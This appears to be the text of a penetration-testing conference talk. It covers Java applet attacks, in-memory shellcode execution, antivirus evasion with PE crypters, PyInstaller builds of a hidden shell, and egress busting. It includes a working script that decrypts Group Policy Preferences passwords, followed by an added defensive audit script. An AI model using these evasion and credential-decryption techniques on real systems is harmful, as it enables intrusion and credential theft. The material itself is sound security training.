Introduction
As penetration testers, exploit writers, huggers, etc., we all have secret techniques we use over and over. Some may be public and some may not, but they are generally obscure and not well known.
The purpose of today's talk is to show you my secrets: some of the techniques I use that aren't widely known. Why show you? I'm an open book on everything I do, and sharing is what it's all about.
Technique #1
Java Applet Attack (SET). Well-known attack method, right? Do you know how it actually works? Do you know the techniques behind it that make it successful?
ZOMG APT
News agencies around the world discovered a new and extremely advanced zero-day exploit against Java. Made me feel kind of special =) How did people find out it was SET?
ILIKEHUGS
Method 2: Shellcodeexec
The shellcodeexec method drops a custom-compiled and modified version of shellcodeexec by Bernardo Damele. The executable takes the alphanumeric shellcode as its int main(int argc, char *argv[]) parameter. It uses VirtualAlloc to allocate read, write, and execute memory space. The alphanumeric shellcode is executed in memory and the payload is delivered.
DEMO: ShellcodeExec
PE Security Evasion
PE Crypters
One of my favorites was recently released, called Hyperion (Christian Ammann from nullsecurity.net). It encrypts the PE file using a randomized simple cipher key with AES-128. When the executable is run, it brute forces the AES key and then decrypts the PE file for you.
DEMO: Hyperion
Hyperion Encryption
Very cool concept, easy to use, and easy to write one for yourself. Gives you a completely unique PE file each time. Slight downfall: the stub used for the brute force is not polymorphic.
Compiling Binaries
PyInstaller compiles Python code into a binary for you by wrapping the Python interpreter into the executable. Works on Linux, OSX, and Windows.
python Configure.py
python Makespec.py --onefile --noconsole shell.py
python Build.py shell/shell.spec
cd shell\dist
Bypassing AV
Egress Busting
A few ways to do it: a pre-staged payload for identifying the way out, or attempting a staged reverse connection on every port. Metasploit has an ALLPORTS payload as well.
The Attack
Navigate to a domain controller and hit up the SYSVOL share. Head to the domain name and the Policies folder. Look for a GUID, then MACHINE\Preferences\Group. Look for the Groups.xml file.
Contents of File
Python Code
# Code was developed and created from
# http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences
from Crypto.Cipher import AES
from base64 import b64decode

# Fixed AES-256 key Microsoft published for GPP cpassword values
key = bytes.fromhex("""
4e 99 06 e8 fc b6 6c c9 fa f4 93 10 62 0f fe e8
f4 96 e8 06 cc 05 79 90 20 9b 09 a4 33 b6 6c 1b
""".replace(" ", "").replace("\n", ""))

cpassword = b64decode("j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw=")

# AES-CBC with an all-zero IV (the original relied on pycrypto's default IV;
# pycryptodome requires it to be passed explicitly)
o = AES.new(key, AES.MODE_CBC, b"\x00" * 16).decrypt(cpassword)

# Strip the PKCS#7 padding, then decode the UTF-16 little-endian plaintext
print(o[:-o[-1]].decode("utf-16-le"))
Decrypted Password
Expanding on Group.xml
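An added audit example, mine rather than code from the slides: it walks a copy of SYSVOL for the Group Policy Preference XML files that can carry a cpassword attribute and reports the affected accounts without decrypting anything, which is the check a domain owner wants to run since MS14-025 only stops new passwords from being written. The sample XML, the account name, and the account-attribute names it looks for are assumptions.

```python
# Added example (not from the original slides): find GPP XML entries
# that still embed a cpassword, so they can be removed from SYSVOL.
import xml.etree.ElementTree as ET
from pathlib import Path

# GPP file types that may carry a cpassword attribute (the MS14-025 set).
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}

# Assumed attribute names used for the account across the file types.
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")


def find_cpasswords(xml_text, source="<memory>"):
    """Return one finding per Properties element carrying a cpassword."""
    findings = []
    for props in ET.fromstring(xml_text).iter("Properties"):
        cpw = props.get("cpassword")
        if not cpw:  # absent or empty: nothing to report
            continue
        account = next((props.get(a) for a in ACCOUNT_ATTRS
                        if props.get(a)), "?")
        findings.append({"source": source, "account": account,
                         "action": props.get("action", "?"),
                         "cpassword_len": len(cpw)})
    return findings


def audit_sysvol(sysvol_root):
    """Walk a SYSVOL copy and collect findings from every GPP file."""
    findings = []
    for path in Path(sysvol_root).rglob("*.xml"):
        if path.name in GPP_FILES:
            text = path.read_text(encoding="utf-8-sig")
            findings.extend(find_cpasswords(text, str(path)))
    return findings


# Constructed Groups.xml sample (account name is made up; the cpassword
# value is the one shown on the slide).
SAMPLE_GROUPS_XML = """<Groups>
  <User name="localadmin">
    <Properties action="U" newName="" fullName="" description=""
      cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw="
      changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"
      userName="localadmin"/>
  </User>
</Groups>"""

if __name__ == "__main__":
    for finding in find_cpasswords(SAMPLE_GROUPS_XML, "Groups.xml"):
        print(finding)
```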
Downloads
For the code and tools used in this presentation, head over to https://www.trustedsec.com and click on Downloads.
Secret Pentesting Techniques, Shhh...
Dave Kennedy, Founder, Principal Security Consultant
Email: davek@trustedsec.com
https://www.trustedsec.com
TrustedSec, LLC, @TrustedSec